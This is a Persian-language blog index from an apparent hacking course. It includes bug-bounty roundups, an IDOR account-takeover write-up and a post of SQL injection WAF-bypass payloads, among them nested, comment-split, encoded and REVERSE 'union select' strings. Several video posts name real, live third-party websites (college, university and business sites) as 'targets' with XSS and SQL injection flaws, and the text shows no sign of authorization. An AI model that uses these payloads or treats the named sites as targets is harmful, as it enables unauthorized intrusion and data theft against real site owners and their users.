نوشته‌ها

مجموعه ۴ مطلب – شماره ۲۶

سلام بهروز منصوری هستم و با قسمت جدیدی از مجموعه ۴ مطلب – شماره ۲۶ در خدمتتون هستم.

این هفته اومدم شمال چون آلودگی تهران خیلی زیاد بود و از طرفی اینجا یه کار کوچیکم داشتم که باید انجام میدادم.

آقا الان نگید تو کرونا و فلان.ما از اون خونه اومدیم تو این خونه.به استیو جابز قسم بیرون نمیریم. 😀 

استیو جابز

 

 

۱- این علم پایان ندارد!

بعضی وقتا میگم این مقاله‌هایی که مطالعه می‌کنم یکم تکراری شدن، روش‌هایی که توضیح داده یمشه تکراری شدن.

بعد یهو یه مقاله مثل این می‌بینم و یهو میگم وااااای چه باحال.

تو این مقاله هکر توضیح داده که چطور از یک سایت کاریابی باگ پیدا کرده و روشی که به باگ رسیده برام جالبه.

توجه به جزئیات، چیزی که همیشه تو کلاسای کلوپ امنیت هم بهش تاکید می‌کنم.

در این مقاله با توجه به یک نکته ساده به نتیجه رسیده و باعث افشای اطلاعات حساس شده.

کلا آسیب‌پذیری‌هایی که منجر به افشای اطلاعات حساس میشه رو من دوست دارم.

جالبیش برام اینه که چقدر به امنیت اهمیت میدن و بعد ما هنوز تو ایران یوزر و پسورد مدیریت رو میدیم به مدیر سایت و در جواب میگه خب که چی 😐 

 

۲- لازم نیست دکتر باشی ۸-) 

هک سایت و باگ بانتی

این هفته یکی از مقاله‌هایی که مطالعه میکردم، هکر جمله قشنگی رو گفت. ” لازم نیست دکتر باشی که باگ پیدا کنی”.

با زبون بی زبونی گفته اقا بیا فقط تست کن.

قرار نیست خدایگان هک و امنیت باشی که بتونی آسیب‌پذیری پیدا کنی.

فقط کافیه به جزئیات سایت دقت کنی.من سعی کردم بیشتر مقالاتی که اینجا قرار میدم، موارد ساده باشه.

هدفم اینه بدونی از گزارش‌های ساده هم میشه بانتی داشت.حتما که نباید اتم بشکافی گل مولا. 😉 

 

۳- حس خوب

کلوپ امنیت

 

خیلی خوبه وقتی ببینی آموزشی که میدی نتیجه میده و دانشجو از شرکت در دوره راضیه. ۸-) 

 

۴- ازVirusTotal بیشتر انتظار داشتم  😀

باگ VirusTotal

در این مقاله در مورد آسیب‌پذیری سایت VirusTotal توضیح داده شده. 

نکته جالب اینجاست که این سایت از رمز پیش فرض admin استفاده میکرده.

یعنی حتی سایت در این سطح هم ممکنه نکات امنیتی رو رعایت نکنه و مارو شگفت زده کنه.

 

آخر هفته خوبی داشته باشید 😉 

“مجموعه ۴ مطلب – شماره ۲۶”

ویدیو تست نفوذ کالج سنت جوزف هنگ کنگ

سلام خدمت دوستان عزیز

امروز قراره در این تارگت خوب نکته‌ای رو بررسی کنم که قبل از این ویدیویی براش منتشر نکردم.

عزیزانی که همیشه درگیر پیدا کردن صفحه مدیریت و پیدا کردن جدول مهم هستند این ویدیو رو از دست ندن.

تارگت مورد نظر آسیب‌پذیری xss و sql injection دارد.

توجه داشته باشید که استدلال استفاده شده در ویدیو همیشگی نیست ولی در اکثر موارد نتیجه مثبت می‌دهد.

قبلا هم سایت‌های دانشگاهی زیادی را بررسی کردیم که پیشنهاد می‌کنم از این ویدیوها دیدن کنید.

برای نمونه ویدیو تست نفوذ سایت دانشگاه Toronto

 

تارگت مورد بررسی :

https://www.sjc.edu.hk

 

 
 
 
 
“ویدیو تست نفوذ کالج سنت جوزف هنگ کنگ”

رایتاپ تصاحب حساب کاربری با IDOR بخش دوم

سلام خدمت دوستان عزیز

امروز با رایتاپ تصاحب حساب کاربری با IDOR بخش دوم، در خدمتتون هستم.

از طریق IDOR تونستم Account Takeover انجام بدم که در ویدیو توضیح دادم.

هفته گذشته یه رایتاپ مشابه این مورد منتشر کردم که اینجا می‌تونید مطالعه کنید.

رایتاپ تصاحب حساب کاربری با IDOR بخش دوم

در ضمن اگر استقبال خوب باشه بازم از این دست ویدیوها قرار میدم. 😉 

چون ممکنه یکسری از دوستان با این مورد آشنا نباشن، اول یه توضیح مختصر در مورد این آسیب‌پذیری داشته باشیم:

idor مخفف عبارت Insecure Direct Object References است.

این نوع آسیب پذیری زمانی رخ میده که توسعه‌دهنده، بدون پیاده سازی مکانیزم‌های کنترل سطح دسترسی و… ، دسترسی منبع/منابع به شئ/اشیاء داخلی برنامه یا سیستم را باز گذاشته باشد.

هکر با دستکاری مقادیر چنین ارجاعاتی میتواند به داده‌های مهم برنامه‌ی وب یا سرور دسترسی غیر مجاز داشته باشد.

برای انجام این حمله معمولا نیاز داریم که از ابزار burp suite هم کمک بگیریم.

نکته : چون گزارش این باگ مربوط به برنامه private از یک پلتفرم بود از سایت نام برده نشده.

 

 

“رایتاپ تصاحب حساب کاربری با IDOR بخش دوم”

 

 

مجموعه ۴ مطلب – شماره ۱۹

سلام بهروز هستم و با قسمت جدیدی از مجموعه ۴ مطلب – شماره ۱۹ در خدمتتون هستم.

در این ۴ مطلب قراه گزارش باگ‌های یکی از هکرهای اندونزی به نام Ajay رو بررسی کنیم.

گزارش باگ‌هایی که خیلی ساده هستن ولی شاید هرکسی به این نکات توجه نداشته باشه.

عاشق مطالعه این دست مقالات هستم، چون دیدم رو نسبت به موضوعات تغییر میده.

۱- ۱ گزارش باگ و ۲ جایزه

1 گزارش باگ و 2 جایزه

در این مقاله می‌بینید که Ajay ابتدا به کمک برنامه burp suite یک آسیب‌پذیری از اینستاگرام گزارش می‌دهد و مبلغ ۳۵۰۰ دلار بانتی دریافت می‌کند.

بعد از برطرف شدن آسیب‌پذیری متوجه می‌شود که هنوز هم امکان استفاده از آسیب‌پذیری به شکل دیگری وجود دارد.

در نتیجه دوباره ایمیل می‌زند و این مورد رو به بخش امنیتی فیسبوک گزارش می‌کند و جالب اینجاست که ۲۰۰۰ دلار دیگر دریافت می‌کند.

۲- جابه‌جا کردن پول

جابه‌جا کردن پول

در این مقاله می‌بینید که چقدر ساده با تغییر request می‌توانیم کارهای بزرگ انجام دهیم.

تغییر دادن request کار سخت و پیچیده‌ای نیست.کافیه از ابزاری همچون burp suite استفاده کنید.

راستی آموزش جامع burp suite رو قبلا در فرانش قرار دادم که می‌تونید استفاده کنید.

۳- بایپس انقضا جلسه در برنامه فیسبوک

شدیداً به این مورد اعتقاد دارم که جدای از بحث تجربه و مهارت، برای موفقیت در باگ بانتی نکته بین بودن موثره.

مثلا در این مقاله می‌بینید که فردی با دقت کردن به یک نکته ساده تونسته یه آسیب‌پذیری از یک برنامه وابسطه به فیسبوک پیدا کنه و ۱۵۰۰ دلار جایزه بگیره.

در کنار توضیحاتی که داده شده ویدیو نحوه انجام کار هم قرار داده که می‌تونید مشاهده کنید.

 

۴- ایرانی همیشه در صحنه

این هفته داشتم جستجو میکردم و دنبال مطلبی بودم که رسیدم به سایت Hackforum که تقریبا میشه گفت بزرگترین انجمن هک و امنیت دنیاست.

همینطور که داشتم بررسی میکردم، نام کاربری افراد به چشمم خورد.ببینید:

ایرانی همیشه در صحنه

خب حالا این که ایرانیا هر جایی که فکرش رو کنی حضور دارند که خیلی بد نیست ولی آخه نام کاربری kalampolo2 ؟؟؟ 😀 

قشنگ مشخصه خاصه هم خارجی به نظر بیاد هم اصالت ایرانیش رو حفظ کنه 😉 

 

آخر هفته خوبی داشته باشید

 

مجموعه ۴ مطلب – شماره ۱۹

 

 

 

 

مجموعه ۴ مطلب – شماره ۱۶

سلام خدمت دوستان عزیز

امیدوارم حال دلتون خوب باشه و تو این روزای قرنطینه به جای غر زدن، سعی کنید از فرصت استفاده کنید تا مهارت خودتون رو افزایش بدید.

این بخش از “۴ مطلب” رو از دست ندید چون قراره ۴ تا مطلب آموزشی قرار بدم. 😉 

 

۱- بایپس Waf

بایپس Waf

 

راستش یادم نیست قبلا داخل سایت مطلبی در مورد Waf گفتم یا نه!!

برای همین یه توضیح مختصر در مورد waf میدم.

WAF گزینه ایست که بین فایروال و وب سرور قرار می‌گیرد و وظیفه کنترل کاربران را بر عهده دارد و از حملاتی که سبب دسترسی کاربران غیر مجاز به اطلاعات محرمانه می‌شود جلوگیری می‌کند.

WAF در دو نوع نرم‌افزاری و سخت‌افزاری وجود دارد.

بیش از ۷۵ درصد از حملاتی که منجر به دسترسی غیرمجاز هکرها به اطلاعات می‌شود، از طریق Web صورت می‌گیرد.

به این دلیل که دسترسی به وب سرور، هم دسترسی به دیتای اصلی یک سایت است، هم راه نفوذ را برای ورود به سایر سرورهای یک Data Center مقدور می‌سازد.

حملاتی که WAF در لایه ۷ از بروز آنها روی وب سرور جلوگیری می‌کند به شرح زیر می‌باشند:

  •  Protection against common attacks
  •  SQL Injection
  •  (Cross Site Scripting (XSS
  •  (Cross-Site Request Forgery (CSRF
  •  Session Hijacking
  •  Buffer Overflow
  •  OS command injection
  •  Information leakage
  •  (Denial of Service (DoS
  •  Malicious Robots
  •  Parameter Tampering
  •  Malicious and Illegal Encoding
  •  Directory Traversal
  •  Web Server and OS Attacks
  •  Site Reconnaissance
  • Remote File Inclusion (RFI)

حالا که با مفهوم waf آشنا شدید بریم سراغ یکی از روش‌های دور زدن همین waf.

من اسم این روش رو میزارم union تودرتو.

بعضی وقتا سایت به دستور union یا select حساسه.

در این شرایط شما اگر هرکاری برای بایپس کردن انجام بدید بی نتیجه باقی می‌مونه، علتشم اینه که دستور union یا select پاک میشه.

حالا باید چکار کنیم؟نگران نباشید روش تودرتو جواب میده.

 

 uniunionon selselectect

 

در این شرایط WAF کلمه کلیدی که انتخاب کرده را حذف می‌کند.یعنی همان کلمه union و select.

به محض اینکه دستورات فیلتر شد، برای نمونه کلمه کلیدی select حذف می‌شود و sel از ابتدا و ect از انتها ادغام می‌شود و یک select جدید ایجاد و در سرور اجرا می‌شود.

 

۲- ۲ بایپس ساده

در ادامه بحث قبلی بایپس رو ادامه میدم.

روش‌های زیادی برای بایپس کردن waf وجود داره.

برای نمونه فرض کنیم سایت ما به دستور union و select یا یکی از این‌ها حساس است.

id=1+un/**/ion+sel/**/ect+1,2,3

id=1+un*ion+sel*ect+1,2,3

 

این دو روش رو به خاطر بسپارید.این روش‌ها می‌تونه راهگشای کار شما در فرایند تست نفوذ با استفاده از Sql injection باشه.

۳- روش Buffer Overflow + SQL Injection

Buffer Overflow + SQL Injection

برای کسانی که نمی‌دانند ، “سرریز بافر یا اضافه بافر ، ناهنجاری است که در آن یک برنامه، در حالی که داده را در یک بافر می‌نویسد ، از مرز بافر عبور کرده و مکان‌های حافظه مجاور را رونویسی می‌کند.”.

ما می‌توانیم از این آسیب‌پذیری که در برخی از WAF ها وجود دارد استفاده کنیم.

بسیاری از فایروال ها با C یا C++ نوشته شده‌اند که می توانیم آنها را با سرریز بافر خراب کنیم، چون برخی از متغیرهای برنامه می‌توانند فقط مقدار کمی حافظه را بگیرند و در صورت عدم محافظت یا کدگذاری نامناسب، می‌توانیم آن را دور بزنیم.

اجازه بدید یک مثال داشته باشیم:

 

http://www.website.com/?id=-15+and+(select 1)=(Select 0xAA here we add about 1000 A)+/*!uNIOn*/+/*!SeLECt*/+1,2

 

حالا سوال اساسی اینجاست که از کجا بفهمیم میشه از این روش Buffer Overflow استفاده کرد یا نه؟

برای این که متوجه بشیم کافیه فایروال رو تست کنیم.از دستور زیر استفاده می‌کنیم.

 

http://www.website.com/ id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/% 0A/*nnaa*/+1,2

 

بعد از زدن این دستور اگر سایت ارور ۵۰۰ داد یعنی میشه از این روش استفاده کرد.

 

۴- بازم بایپس 😉 

بایپس sql injection

 

خسته که نشدید؟ 😀 

اونایی که میگن خسته شدیم دیگه هک رو ادامه ندن.چون هک یعنی دنیایی از این چالش‌ها.

اما اونایی که نه تنها خسته نشدن بلکه تشنه‌ی یادگیری مطلب جدید هستن این بخش هم مطالعه کنن.

خب با روش‌های مختلفی رو تست زدیم بریم سراغ یه روش دیگه.

 

http://www.website.com/?id=15 /*!u%6eion*/ /*!se%6cect*/ 1,2

 

لازم نیست که همیشه فقط کاراکتر اول را encode کنیم.این کار رو میشه وسط دستور هم انجام داد و اتفاقا بعضی مواقع خیلی خوب جواب میده.

خیلی وقت‌ها کوتیشن میتونه راه گشا باشه.مثل حالت زیر:

 

http://www.website.com/?id=-15+uni’on+sel’ect+1,2

 

حالا که اینقدر با لذت تا اینجای مطلب رو مطالعه کدی پس بزار یه روش دیگه هم بهت نشون بدم.

 

/* — */union/* — */select/* — */

 

یه مورد دیگم داریم که بهش میگیم روش معکوس یا REVERSE

 

REVERSE(noinu)+REVERSE(tceles)

 

در این روش هم کار بسیار سادست، کافیه کلمه union و select  رو از آخر به اول بنویسیم.

که میشه به این حالتی که در بایپس مشاهده کردید.

 

نوشتن این ۴ مطلب تقریبا ۱ ساعت زمان برد.فدای سر تک تک شما عزیزان.ولی خیلی خوب میشه اگر این مطلب رو با دوستانتون به اشتراک بگذارید تا یکم روحیه بگیرم 😉 

 

 

 

 

 

گزارش باگ سایت‌های ایرانی – سری دوم

در گزارش باگ سایت‌های ایرانی – سری دوم قراره در مورد گزارش باگ سایت‌های داخلی کشور عزیزم ایران صحبت کنم و بانتی‌هایی که دریافت شده.

گزارش باگ سایت‌های ایرانی – سری اول

در گزارش باگ سایت‌های ایرانی (سری اول) قراره در مورد گزارش باگ سایت‌های داخلی کشور عزیزم ایران صحبت کنم و بانتی‌هایی که دریافت شده.

ویدیو تست نفوذ سایت دانشگاه Victoria

ویدیو تست نفوذ سایت دانشگاه Victoria

ویدیو تست نفوذ سایت دانشگاه Victoria

سلام خدمت شما

قبلا تست نفوذی روی سایت دانشگاه Nevada داشتیم و این بار قراره روی دانشگاه دیگه‌ای از کانادا کار کنیم.

تارگت انتخابی—-> دانشگاه ویکتوریا کانادا

دانشگاه ویکتوریا، واقع در ویکتوریا، پایتخت بریتیش کلمبیا، یکی از دانشگاه‌های برتر تحقیقاتی کانادا است.

UVic به مدت دو سال متوالی به عنوان دومین دانشگاه جامع برتر در کانادا رتبه‌بندی شده‌است.

پردیس این دانشگاه در ۷ کیلومتری شمال مرکز شهر ویکتوریا واقع شده‌است و بیش از ۴۰۳ هکتار مساحت دارد.

این دانشگاه دومین مؤسسه تحقیقاتی بزرگ منطقه و پیشرو در پروژه‌های مربوط به بستر دریا و آبهای عمیق رصدخانه VENUS و NEPTUNE است.

UVic به ارتباطات جهانی متعهد است.اعضای هیئت علمی، کارکنان و دانشجویان آن با بیش از ۳۰۰ مؤسسه در ۷۰ کشور جهان همکاری دارند.

 

سایت مورد بررسی : https://www.uvic.ca

پیشنهاد می‌کنم ویدیو تست نفوذ سایت دانشگاه Victoria رو از دست ندید

اگر به هک و امنیت علاقه دارید می‌توانید در دوره کلوپ امنیت ۱ با موضوع وب هکینگ و کلوپ امنیت ۲ با موضوع کلاینت هکینگ شرکت کنید.

 

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۸)

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۸)

ویدیو آموزش تست امنیت سایت (سایت شماره 38)

سلام خدمت شما

با سی و هشتمین تارگت از مجموعه آموزشی تست امنیت سایت در خدمت شما بزرگواران هستم.

برای این بخش از آموزش تارگتی از کشور لهستان رو آماده کردیم.تارگت قبلی از کشور هند بود.

لِهِستان یا لَهِستان با نام رسمی جمهوری لهستان کشوری است در مرکز اروپا، از غرب با آلمان، از جنوب غربی با جمهوری چک، از جنوب با اسلوواکی، از شمال شرقی با لیتوانی و روسیه، از شرق با بلاروس، از جنوب شرقی با اوکراین و از شمال با دریای بالتیک همسایه است.

مساحت این کشور عددی بالغ بر ۳۱۲٬۶ هزار کیلومتر مربع است که آن را ۶۹مین کشور بزرگ جهان و نهمین کشور بزرگ اروپا کرده‌است.

همچنین با جمعیت ۳۷٫۸ میلیون نفری این کشور سی و چهارمین کشور پرجمعیت جهان، هشتمین در قاره اروپا و ششمین در اتحادیه اروپایی می‌باشد.

لهستان با حاکمیتی متمرکز دارای ۱۶ استان است و پایتخت آن ورشو نام دارد.

قوه مجریه این کشور به ترتیب رئیس‌جمهور، نخست‌وزیر و هیئت وزیران است.

رئیس‌جمهور برای مدت ۵ سال انتخاب می‌گردد که حداکثر یک رئیس‌جمهور می‌تواند دو دوره در این پست خدمت کند.

 

زمانی که تست نفوذ انجام میدید باید به این مورد توجه داشته باشید که سایت مربوط به چه کشوری است.چرا؟ویدیو رو ببینید متوجه میشید

 

ممنون میشم برای حمایت از ما کلوپ امنیت رو به دوستانتون معرفی کنید.

 

سایت‌ مورد بررسی :

http://www.wsw.nmm.pl

 
 

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۸)

 

 
 

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۶)

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۶)

ویدیو آموزش تست امنیت سایت (سایت شماره 36)

سلام خدمت شما

با سی و ششمین تارگت از مجموعه آموزشی تست امنیت سایت در خدمت شما بزرگواران هستم.

پاکستان با نام رسمی جمهوری اسلامی پاکستان، کشوری در آسیای جنوبی واقع در غرب شبه قاره هند است.

این کشور در جنوب مرز آبی هزار کیلومتری با دریای عمان دارد و از غرب با ایران، از شمال با افغانستان، از شرق با هندوستان، و از شمال شرق با چین هم‌مرز است.

مساحت پاکستان ۸۸۱٬۹۱۳ کیلومترمربع و جمعیت آن ۲۲۸،۹۳۵،۱۴۵ نفر است.

پایتخت آن اسلام‌آباد و بزرگترین شهر آن کراچی نام دارد.

زبان رسمی پاکستان انگلیسی و اردو است.

دین رسمی جمهوری فدرال پاکستان اسلام است و در میان کشورهای اسلامی، دومین کشور از نظر تعداد مسلمانان محسوب می‌شود.

این کشور در سال ۱۹۴۷ به عنوان یک دولت و کشور جدید از هند مستقل شد.

در سال ۱۹۷۱ جنگ داخلی به جدایی پاکستان شرقی با نام بنگلادش از این کشور منجر شد.

از زمان استقلال، جمهوری فدرال پاکستان دوره‌های رشد نظامی و اقتصادی و همچنین بی‌ثباتی را هنگام جدا شدن بنگلادش از خود، گذرانده‌است.

جمهوری فدرال پاکستان از لحاظ بزرگی نیروهای مسلح در رده هفتم جهان است.

پاکستان هفتمین کشور جهان بر پایه تعداد نیروهای نظامی دائمی است، این کشور از قدرت‌های هسته‌ای و از کشورهای دارای سلاح هسته‌ای و و تنها کشور اسلامی دارنده آن است.

ناحیه کشمیر مورد ادعای هند و پاکستان است.

هر دو کشور به‌طور جداگانه بخش‌هایی از این منطقه را اداره می‌کنند و این مناطق توسط خط کنترل از هم جدا شده‌اند.

جمهوری فدرال پاکستان بر اساس برآورد سال ۲۰۲۰ با بیش از ۲۲۰ میلیون نفر جمعیت، پنجمین کشور پرجمعیت دنیا و پرجمعیت‌تر از کشور پهناوری مانند برزیل است.

 

این تارگت دارای نکته جالبیست که در ویدیو در مورد آن توضیح داده می‌شود. 😉 

 

این تارگت رو آقای رضایی مهر از دانشجویان خوب دوره کلوپ امنیت برای ما ارسال کردند.

ممنون میشم برای حمایت از ما کلوپ امنیت رو به دوستانتون معرفی کنید.

 

سایت‌ مورد بررسی :

http://pakistanpilgrims.com

 
 

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۶)

 

 
 

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۳)

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۳)

ویدیو آموزش تست امنیت سایت (سایت شماره 33)

سلام خدمت شما

با سی و سومین تارگت  از مجموعه آموزشی تست امنیت سایت در خدمت شما بزرگواران هستم.

در این تارگت، به جای آنکه جداول وب‌سایت روی صفحه چاپ شود، در اسلایدر به نمایش در می‌آیند. 😉 

این تارگت رو آقای سینا فراشی از دانشجویان خوب دوره کلوپ امنیت برای ما ارسال کردند.

ممنون میشم برای حمایت از ما کلوپ امنیت رو به دوستانتون معرفی کنید.

 

سایت‌ مورد بررسی :

http://www.ssy.org

 
 

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۳)

 

 
 

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۲)

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۲)

ویدیو آموزش تست امنیت سایت (سایت شماره 32)

سلام خدمت شما

با سی و دومین تارگت  از مجموعه آموزشی تست امنیت سایت در خدمت شما بزرگواران هستم.

قِبرِس با نام رسمی جمهوری قبرس کشوری جزیره‌ای است، در شرق دریای مدیترانه که پایتخت آن نیکوزیا است.

قسمتی از شمال این جزیره قبرس شمالی (بخش ترک‌نشین) دارای ساکنان مسلمان و ترک‌زبان قبرسی می باشد و بخش جنوبی (اروپایی) این جزیره عموماً قبرسی (یونانی‌نشین) هستند.

در قبرس هردو زبان یونانی و زبان ترکی زبان‌های رسمی هستند.

یونانی‌ها مسیحی ارتودوکس و ترک‌های قبرس مسلمان هستند.

جزیره قبرس بعد از جزیره ساردنی و سیسیل سومین جزیره بزرگ در دریای مدیترانه‌است و جمهوری قبرس از اعضای اتحادیه اروپا می‌باشد.

قبرس از نقاط گردشگرپذیر مدیترانه‌است و در ۱ ژانویه ۲۰۰۸ به حوزه یورو پیوست.

جمعیت کل جزیره یک میلیون و صد هزار نفر است و جمعیت جمهوری قبرس بدون احتساب قبرس شمالی ۶۲۰ هزار نفر است.

۵۷ درصد مردم این جزیره یونانی و ۴۳ درصد نیز از ترکان قبرس هستند.

اسکندر مقدونی در ۳۳۳ پیش از میلاد قبرس را از ایران جدا کرد.

از سال ۱۹۷۴ که ارتش ترکیه در واکنش به کودتای یونانی‌ها به شمال قبرس هجوم برد، این جزیره به دو بخش تقسیم شد.

پس از آن بخش جنوبی قبرس که در اختیار یونانی‌هاست به اتحادیه اروپا پیوست اما بخش ترک‌نشین شمالی جدا ماند.

بخش شمالی قبرس تنها توسط ترکیه به عنوان کشوری مستقل به رسمیت شناخته شده‌است.

نام قبرس به دلیل صادرات مس فراوان در گذشته‌های دور برگرفته از کلمه کوپروس (مس) می‌باشد

 

در این تارگت در مورد بایپس به کمک encode صحبت خواهیم کرد. ۸-) 

تارگت رو از دانشجویان خوبمون آقای علی رنجبر برامون ارسال کردن.

ممنون میشم برای حمایت از ما کلوپ امنیت رو به دوستانتون معرفی کنید.

 

 

سایت‌ مورد بررسی :

http://ampelohori.com

سایت مربوط به کشور قبرس می‌باشند.

 
 

ویدیو آموزش تست امنیت سایت (سایت شماره ۳۲)